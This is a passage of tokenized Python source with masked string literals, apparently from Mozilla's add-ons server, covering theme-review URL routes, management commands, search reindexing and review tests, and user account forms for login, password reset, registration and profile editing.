'<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : True } ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : True } ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue_flagged , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue_rereview , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_commit , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_single , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , <EOL> views_themes . themes_history , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views_themes . themes_logs , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . release_locks , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . deleted_themes , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_search , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from olympia . landfill . generators import generate_themes <EOL> class Command ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> help = __doc__ <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT:email>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> def handle ( self , * args , ** kwargs ) : <EOL> if not settings . DEBUG : <EOL> raise CommandError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> num = int ( args [ <NUM_LIT:0> ] ) <EOL> email = kwargs . get ( '<STR_LIT:email>' ) <EOL> generate_themes ( num , email ) </s>
<s> import StringIO <EOL> import threading <EOL> import time <EOL> from django . core import management <EOL> from django . db import connection <EOL> from django . test . testcases import TransactionTestCase <EOL> from olympia . amo . search import get_es <EOL> from olympia . amo . tests import addon_factory , ESTestCase <EOL> from olympia . amo . urlresolvers import reverse <EOL> from olympia . amo . utils import urlparams <EOL> from olympia . lib . es . utils import is_reindexing_amo , unflag_reindexing_amo <EOL> ES = get_es ( ) <EOL> class TestIndexCommand ( ESTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestIndexCommand , self ) . setUp ( ) <EOL> if is_reindexing_amo ( ) : <EOL> unflag_reindexing_amo ( ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . indices = ES . indices . status ( ) [ '<STR_LIT>' ] . keys ( ) <EOL> def _fixture_setup ( self ) : <EOL> return TransactionTestCase . _fixture_setup ( self ) <EOL> def _fixture_teardown ( self ) : <EOL> return TransactionTestCase . _fixture_teardown ( self ) <EOL> def tearDown ( self ) : <EOL> current_indices = ES . indices . status ( ) [ '<STR_LIT>' ] . keys ( ) <EOL> for index in current_indices : <EOL> if index not in self . indices : <EOL> ES . indices . delete ( index , ignore = <NUM_LIT> ) <EOL> super ( TestIndexCommand , self ) . tearDown ( ) <EOL> def check_results ( self , expected ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( urlparams ( self . url , sort = '<STR_LIT>' ) ) <EOL> assert response . status_code == <NUM_LIT:200> <EOL> got = self . get_results ( response ) <EOL> for addon in expected : <EOL> assert addon . pk in got , '<STR_LIT>' % ( addon . pk , got ) <EOL> return response <EOL> def get_results ( self , response ) : <EOL> """<STR_LIT>""" <EOL> pager = response . context [ '<STR_LIT>' ] <EOL> results = [ ] <EOL> for page_num in range ( pager . paginator . num_pages ) : <EOL> results . extend ( [ item . pk for item <EOL> in pager . paginator . page ( page_num + <NUM_LIT:1> ) ] ) <EOL> return results <EOL> def get_indices_aliases ( self ) : <EOL> """<STR_LIT>""" <EOL> indices = ES . indices . get_aliases ( ) <EOL> items = [ ( index , aliases [ '<STR_LIT>' ] . keys ( ) [ <NUM_LIT:0> ] ) <EOL> for index , aliases in indices . items ( ) <EOL> if len ( aliases [ '<STR_LIT>' ] ) > <NUM_LIT:0> and index . startswith ( '<STR_LIT:test>' ) ] <EOL> items . sort ( ) <EOL> return items <EOL> def test_reindexation ( self ) : <EOL> addon = addon_factory ( ) <EOL> self . refresh ( ) <EOL> wanted = [ addon ] <EOL> self . check_results ( wanted ) <EOL> old_indices = self . get_indices_aliases ( ) <EOL> class ReindexThread ( threading . Thread ) : <EOL> def __init__ ( self ) : <EOL> self . stdout = StringIO . StringIO ( ) <EOL> super ( ReindexThread , self ) . __init__ ( ) <EOL> def run ( self ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> management . call_command ( '<STR_LIT>' , stdout = self . stdout ) <EOL> t = ReindexThread ( ) <EOL> t . start ( ) <EOL> while t . is_alive ( ) and not is_reindexing_amo ( ) : <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> old_addons_count = len ( wanted ) <EOL> while t . is_alive ( ) and len ( wanted ) < old_addons_count + <NUM_LIT:3> : <EOL> wanted . append ( addon_factory ( ) ) <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> self . refresh ( ) <EOL> self . check_results ( wanted ) <EOL> if len ( wanted ) == old_addons_count : <EOL> raise AssertionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> t . join ( ) <EOL> t . stdout . seek ( <NUM_LIT:0> ) <EOL> stdout = t . stdout . read ( ) <EOL> assert '<STR_LIT>' in stdout , stdout <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> self . refresh ( ) <EOL> self . check_results ( wanted ) <EOL> new_indices = self . get_indices_aliases ( ) <EOL> assert len ( old_indices ) == len ( new_indices ) <EOL> assert old_indices != new_indices , ( stdout , old_indices , new_indices ) </s>
<s> from amo . utils import chunked <EOL> from mkt . developers . tasks import generate_image_assets <EOL> from mkt . webapps . models import Webapp <EOL> def run ( ) : <EOL> for chunk in chunked ( Webapp . objects . all ( ) , <NUM_LIT:50> ) : <EOL> for app in chunk : <EOL> try : <EOL> generate_image_assets . delay ( app ) <EOL> except Exception : <EOL> pass </s>
<s> from mkt . collections . models import Collection <EOL> def run ( ) : <EOL> """<STR_LIT>""" <EOL> for c in Collection . objects . all ( ) : <EOL> c . save ( ) </s>
<s> from django . utils import translation <EOL> from olympia import amo <EOL> from olympia . amo . tests import TestCase , ESTestCase <EOL> from olympia . addons . models import Addon <EOL> from olympia . reviews import tasks <EOL> from olympia . reviews . models import ( <EOL> check_spam , GroupedRating , Review , ReviewFlag , Spam ) <EOL> from olympia . users . models import UserProfile <EOL> class TestReviewModel ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_translations ( self ) : <EOL> translation . activate ( '<STR_LIT>' ) <EOL> r1 = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> self . trans_eq ( r1 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> r2 = Review . objects . get ( id = <NUM_LIT:2> ) <EOL> self . trans_eq ( r2 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> translation . activate ( '<STR_LIT>' ) <EOL> r1 = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> self . trans_eq ( r1 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> r2 = Review . objects . get ( id = <NUM_LIT:2> ) <EOL> self . trans_eq ( r2 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_soft_delete ( self ) : <EOL> assert Review . objects . count ( ) == <NUM_LIT:2> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> Review . objects . get ( id = <NUM_LIT:1> ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:1> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> Review . objects . filter ( id = <NUM_LIT:2> ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:0> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> def test_filter_for_many_to_many ( self ) : <EOL> review = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> addon = review . addon <EOL> assert review in addon . _reviews . all ( ) <EOL> review . update ( deleted = True ) <EOL> addon = Addon . objects . get ( pk = addon . pk ) <EOL> assert review not in addon . _reviews . all ( ) <EOL> def test_no_filter_for_relations ( self ) : <EOL> review = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> flag = ReviewFlag . objects . create ( review = review , <EOL> flag = '<STR_LIT>' ) <EOL> assert flag . review == review <EOL> review . update ( deleted = True ) <EOL> flag = ReviewFlag . objects . get ( pk = flag . pk ) <EOL> assert flag . review == review <EOL> class TestGroupedRating ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> grouped_ratings = [ ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ] <EOL> def test_get_none ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT:3> , update_none = False ) is None <EOL> def test_set ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> GroupedRating . set ( <NUM_LIT> ) <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) == ( <EOL> self . grouped_ratings ) <EOL> def test_cron ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> tasks . addon_grouped_rating ( <NUM_LIT> ) <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) == ( <EOL> self . grouped_ratings ) <EOL> def test_update_none ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = True ) == ( <EOL> self . grouped_ratings ) <EOL> class TestSpamTest ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_create_not_there ( self ) : <EOL> Review . objects . all ( ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:0> <EOL> check_spam ( <NUM_LIT:1> ) <EOL> def test_add ( self ) : <EOL> assert Spam ( ) . add ( Review . objects . all ( ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> class TestRefreshTest ( ESTestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( TestRefreshTest , self ) . setUp ( ) <EOL> self . addon = Addon . objects . create ( type = amo . ADDON_EXTENSION ) <EOL> self . user = UserProfile . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> <EOL> def get_bayesian_rating ( self ) : <EOL> q = Addon . search ( ) . filter ( id = self . addon . id ) <EOL> return list ( q . values_dict ( '<STR_LIT>' ) ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def test_created ( self ) : <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> <EOL> Review . objects . create ( addon = self . addon , user = self . user , rating = <NUM_LIT:4> ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT> <EOL> def test_edited ( self ) : <EOL> self . test_created ( ) <EOL> r = self . addon . reviews . all ( ) [ <NUM_LIT:0> ] <EOL> r . rating = <NUM_LIT:1> <EOL> r . save ( ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT> <EOL> def test_deleted ( self ) : <EOL> self . test_created ( ) <EOL> r = self . addon . reviews . all ( ) [ <NUM_LIT:0> ] <EOL> r . delete ( ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> </s>
<s> from django import forms <EOL> class DateForm ( forms . Form ) : <EOL> start = forms . DateField ( input_formats = [ '<STR_LIT>' ] , required = False ) <EOL> end = forms . DateField ( input_formats = [ '<STR_LIT>' ] , required = False ) <EOL> last = forms . IntegerField ( required = False ) </s>
<s> from django . core . management . base import BaseCommand <EOL> from olympia . tags . models import Tag <EOL> from olympia . tags . tasks import clean_tag <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** kw ) : <EOL> pks = list ( Tag . objects . values_list ( '<STR_LIT>' , flat = True ) . order_by ( '<STR_LIT>' ) ) <EOL> print "<STR_LIT>" % len ( pks ) <EOL> for pk in pks : <EOL> clean_tag . delay ( pk ) </s>
<s> import os <EOL> import re <EOL> from smtplib import SMTPException <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . core . files . storage import default_storage as storage <EOL> from django . contrib . auth import forms as auth_forms <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . forms . util import ErrorList <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext as _ , ugettext_lazy as _lazy <EOL> import commonware . log <EOL> import happyforms <EOL> from olympia import amo <EOL> from olympia . accounts . views import fxa_error_message <EOL> from olympia . amo . fields import ReCaptchaField , HttpHttpsOnlyURLField <EOL> from olympia . users import notifications as email <EOL> from olympia . amo . urlresolvers import reverse <EOL> from olympia . amo . utils import clean_nl , has_links , log_cef , slug_validator <EOL> from olympia . translations import LOCALES <EOL> from . import tasks <EOL> from . models import ( <EOL> UserProfile , UserNotification , BlacklistedName , BlacklistedEmailDomain , <EOL> BlacklistedPassword ) <EOL> from . widgets import ( <EOL> NotificationsSelectMultiple , RequiredCheckboxInput , RequiredEmailInput , <EOL> RequiredInputMixin , RequiredTextarea ) <EOL> log = commonware . log . getLogger ( '<STR_LIT>' ) <EOL> admin_re = re . compile ( '<STR_LIT>' ) <EOL> class PasswordMixin : <EOL> min_length = <NUM_LIT:8> <EOL> error_msg = { <EOL> '<STR_LIT>' : _lazy ( '<STR_LIT>' ) % min_length } <EOL> @ classmethod <EOL> def widget ( cls , ** kw ) : <EOL> attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cls . min_length , <EOL> } <EOL> if kw . pop ( '<STR_LIT>' , False ) : <EOL> attrs . update ( RequiredInputMixin . required_attrs ) <EOL> return forms . PasswordInput ( attrs = attrs , ** kw ) <EOL> def clean_password ( self , field = '<STR_LIT:password>' , instance = '<STR_LIT>' ) : <EOL> data = self . cleaned_data [ field ] <EOL> if not data : <EOL> return data <EOL> user = getattr ( self , instance , None ) <EOL> if user and user . pk and user . needs_tougher_password : <EOL> if not admin_re . search ( data ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> if BlacklistedPassword . blocked ( data ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return data <EOL> class AuthenticationForm ( auth_forms . AuthenticationForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT> , widget = RequiredEmailInput ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> rememberme = forms . BooleanField ( required = False ) <EOL> recaptcha = ReCaptchaField ( ) <EOL> recaptcha_shown = forms . BooleanField ( widget = forms . HiddenInput , <EOL> required = False ) <EOL> def __init__ ( self , request = None , use_recaptcha = False , * args , ** kw ) : <EOL> super ( AuthenticationForm , self ) . __init__ ( * args , ** kw ) <EOL> if not use_recaptcha or not settings . NOBOT_RECAPTCHA_PRIVATE_KEY : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> def clean ( self ) : <EOL> if ( '<STR_LIT:password>' in self . errors and '<STR_LIT:password>' in self . data and <EOL> <NUM_LIT:1> < len ( self . data [ '<STR_LIT:password>' ] ) < PasswordMixin . min_length ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( PasswordMixin . min_length , <EOL> reverse ( '<STR_LIT>' ) ) <EOL> self . _errors [ '<STR_LIT:password>' ] = ErrorList ( [ mark_safe ( msg ) ] ) <EOL> if '<STR_LIT>' in self . errors : <EOL> return { } <EOL> return super ( AuthenticationForm , self ) . clean ( ) <EOL> class PasswordResetForm ( auth_forms . PasswordResetForm ) : <EOL> email = forms . EmailField ( widget = RequiredEmailInput ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( PasswordResetForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> self . users_cache = UserProfile . objects . filter ( email__iexact = email ) <EOL> try : <EOL> if self . users_cache . get ( ) . fxa_migrated ( ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> except UserProfile . DoesNotExist : <EOL> pass <EOL> return email <EOL> def save ( self , ** kw ) : <EOL> if not self . users_cache : <EOL> log . info ( "<STR_LIT>" . format ( <EOL> ** self . cleaned_data ) ) <EOL> return <EOL> for user in self . users_cache : <EOL> log . info ( u'<STR_LIT>' % user ) <EOL> if user . needs_tougher_password : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = user , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> else : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = user , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> try : <EOL> self . base_save ( ** kw ) <EOL> except SMTPException , e : <EOL> log . error ( "<STR_LIT>" % ( user , e ) ) <EOL> def base_save ( <EOL> self , domain_override = None , <EOL> subject_template_name = '<STR_LIT>' , <EOL> email_template_name = '<STR_LIT>' , <EOL> use_https = False , token_generator = default_token_generator , <EOL> from_email = None , request = None , html_email_template_name = None ) : <EOL> """<STR_LIT>""" <EOL> from django . core . mail import send_mail <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . sites . models import get_current_site <EOL> from django . template import loader <EOL> from django . utils . encoding import force_bytes <EOL> from django . utils . http import urlsafe_base64_encode <EOL> UserModel = get_user_model ( ) <EOL> email = self . cleaned_data [ "<STR_LIT:email>" ] <EOL> active_users = UserModel . _default_manager . filter ( <EOL> email__iexact = email , <EOL> deleted = False ) <EOL> for user in active_users : <EOL> if not user . has_usable_password ( ) : <EOL> continue <EOL> if not domain_override : <EOL> current_site = get_current_site ( request ) <EOL> site_name = current_site . name <EOL> domain = current_site . domain <EOL> else : <EOL> site_name = domain = domain_override <EOL> c = { <EOL> '<STR_LIT:email>' : user . email , <EOL> '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : site_name , <EOL> '<STR_LIT>' : urlsafe_base64_encode ( force_bytes ( user . pk ) ) , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : token_generator . make_token ( user ) , <EOL> '<STR_LIT>' : '<STR_LIT>' if use_https else '<STR_LIT:http>' , <EOL> } <EOL> subject = loader . render_to_string ( subject_template_name , c ) <EOL> subject = '<STR_LIT>' . join ( subject . splitlines ( ) ) <EOL> email = loader . render_to_string ( email_template_name , c ) <EOL> if html_email_template_name : <EOL> html_email = loader . render_to_string ( <EOL> html_email_template_name , c ) <EOL> else : <EOL> html_email = None <EOL> send_mail ( <EOL> subject , email , from_email , [ user . email ] , <EOL> html_message = html_email ) <EOL> class SetPasswordForm ( auth_forms . SetPasswordForm , PasswordMixin ) : <EOL> new_password1 = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( required = True ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( SetPasswordForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean_new_password1 ( self ) : <EOL> return self . clean_password ( field = '<STR_LIT>' , instance = '<STR_LIT:user>' ) <EOL> def save ( self , ** kw ) : <EOL> amo . log ( amo . LOG . CHANGE_PASSWORD , user = self . user ) <EOL> log . info ( u'<STR_LIT>' % self . user ) <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = self . user . username , signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> super ( SetPasswordForm , self ) . save ( ** kw ) <EOL> class UserDeleteForm ( forms . Form ) : <EOL> email = forms . CharField ( max_length = <NUM_LIT:255> , required = True , <EOL> widget = RequiredEmailInput ) <EOL> confirm = forms . BooleanField ( required = True , widget = RequiredCheckboxInput ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( UserDeleteForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:email>' ] . widget . attrs [ '<STR_LIT>' ] = ( <EOL> self . request . user . email ) <EOL> def clean_email ( self ) : <EOL> user_email = self . request . user . email <EOL> if not user_email == self . cleaned_data [ '<STR_LIT:email>' ] : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) . format ( <EOL> email = user_email ) ) <EOL> def clean ( self ) : <EOL> amouser = self . request . user <EOL> if amouser . is_developer : <EOL> log . warning ( u'<STR_LIT>' <EOL> % self . request . user ) <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> class UsernameMixin : <EOL> def clean_username ( self ) : <EOL> name = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> if not name : <EOL> if self . instance . has_anonymous_username ( ) : <EOL> name = self . instance . username <EOL> else : <EOL> name = self . instance . anonymize_username ( ) <EOL> if name . isdigit ( ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> slug_validator ( <EOL> name , lower = False , <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> if BlacklistedName . blocked ( name ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> if ( UserProfile . objects . exclude ( id = self . instance . id ) <EOL> . filter ( username__iexact = name ) . exists ( ) ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return name <EOL> class UserRegisterForm ( happyforms . ModelForm , UsernameMixin , PasswordMixin ) : <EOL> """<STR_LIT>""" <EOL> username = forms . CharField ( max_length = <NUM_LIT:50> , required = False ) <EOL> email = forms . EmailField ( widget = RequiredEmailInput ) <EOL> display_name = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:50> , <EOL> required = False ) <EOL> location = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> required = False ) <EOL> occupation = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> required = False ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> password2 = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> recaptcha = ReCaptchaField ( ) <EOL> homepage = HttpHttpsOnlyURLField ( label = _lazy ( u'<STR_LIT>' ) , required = False ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT:location>' , '<STR_LIT>' , <EOL> '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> instance = kwargs . get ( '<STR_LIT>' ) <EOL> if instance and instance . has_anonymous_username ( ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> super ( UserRegisterForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if not settings . NOBOT_RECAPTCHA_PRIVATE_KEY : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> errors = { '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) } <EOL> self . fields [ '<STR_LIT>' ] . error_messages = errors <EOL> def clean_email ( self ) : <EOL> d = self . cleaned_data [ '<STR_LIT:email>' ] . split ( '<STR_LIT:@>' ) [ - <NUM_LIT:1> ] <EOL> if BlacklistedEmailDomain . blocked ( d ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return self . cleaned_data [ '<STR_LIT:email>' ] <EOL> def clean_display_name ( self ) : <EOL> name = self . cleaned_data [ '<STR_LIT>' ] <EOL> if BlacklistedName . blocked ( name ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return name <EOL> def clean ( self ) : <EOL> super ( UserRegisterForm , self ) . clean ( ) <EOL> data = self . cleaned_data <EOL> p1 = data . get ( '<STR_LIT:password>' ) <EOL> p2 = data . get ( '<STR_LIT>' ) <EOL> if p1 and p1 != p2 : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = ErrorList ( [ msg ] ) <EOL> if p2 : <EOL> del data [ '<STR_LIT>' ] <EOL> return data <EOL> class UserEditForm ( UserRegisterForm , PasswordMixin ) : <EOL> oldpassword = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , required = False , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False ) ) <EOL> password2 = forms . CharField ( max_length = <NUM_LIT:255> , required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> photo = forms . FileField ( label = _lazy ( u'<STR_LIT>' ) , required = False ) <EOL> notifications = forms . MultipleChoiceField ( <EOL> choices = [ ] , <EOL> widget = NotificationsSelectMultiple , <EOL> initial = email . NOTIFICATIONS_DEFAULT , <EOL> required = False ) <EOL> lang = forms . TypedChoiceField ( label = _lazy ( u'<STR_LIT>' ) , <EOL> choices = LOCALES ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( UserEditForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if not self . instance . lang and self . request : <EOL> self . initial [ '<STR_LIT>' ] = self . request . LANG <EOL> if self . instance : <EOL> default = dict ( ( i , n . default_checked ) for i , n <EOL> in email . NOTIFICATIONS_BY_ID . items ( ) ) <EOL> user = dict ( ( n . notification_id , n . enabled ) for n <EOL> in self . instance . notifications . all ( ) ) <EOL> default . update ( user ) <EOL> choices = email . NOTIFICATIONS_CHOICES <EOL> if not self . instance . is_developer : <EOL> choices = email . NOTIFICATIONS_CHOICES_NOT_DEV <EOL> if self . instance . fxa_migrated ( ) : <EOL> self . fields [ '<STR_LIT:email>' ] . required = False <EOL> self . fields [ '<STR_LIT:email>' ] . widget = forms . EmailInput ( <EOL> attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT:email>' ] . help_text = fxa_error_message ( <EOL> _ ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) ) <EOL> saved = self . instance . notifications . values_list ( '<STR_LIT>' , <EOL> flat = True ) <EOL> self . choices_status = { } <EOL> for idx , label in choices : <EOL> self . choices_status [ idx ] = idx not in saved <EOL> self . fields [ '<STR_LIT>' ] . choices = choices <EOL> self . fields [ '<STR_LIT>' ] . initial = [ i for i , v <EOL> in default . items ( ) if v ] <EOL> self . fields [ '<STR_LIT>' ] . widget . form_instance = self <EOL> if self . fields . get ( '<STR_LIT>' ) : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> class Meta : <EOL> model = UserProfile <EOL> exclude = ( '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def clean ( self ) : <EOL> data = self . cleaned_data <EOL> amouser = self . request . user <EOL> p1 = data . get ( "<STR_LIT:password>" ) <EOL> p2 = data . get ( "<STR_LIT>" ) <EOL> if p1 or p2 : <EOL> if not amouser . check_password ( data [ "<STR_LIT>" ] ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> self . _errors [ "<STR_LIT>" ] = ErrorList ( [ msg ] ) <EOL> del data [ "<STR_LIT>" ] <EOL> super ( UserEditForm , self ) . clean ( ) <EOL> return data <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data . get ( '<STR_LIT:email>' ) <EOL> if self . instance . fxa_migrated ( ) : <EOL> if not email or email == self . instance . email : <EOL> return self . instance . email <EOL> else : <EOL> raise forms . ValidationError ( _ ( u'<STR_LIT>' ) ) <EOL> else : <EOL> return email <EOL> def clean_photo ( self ) : <EOL> photo = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not photo : <EOL> return <EOL> if photo . content_type not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> if photo . size > settings . MAX_PHOTO_UPLOAD_SIZE : <EOL> raise forms . ValidationError ( <EOL> _ 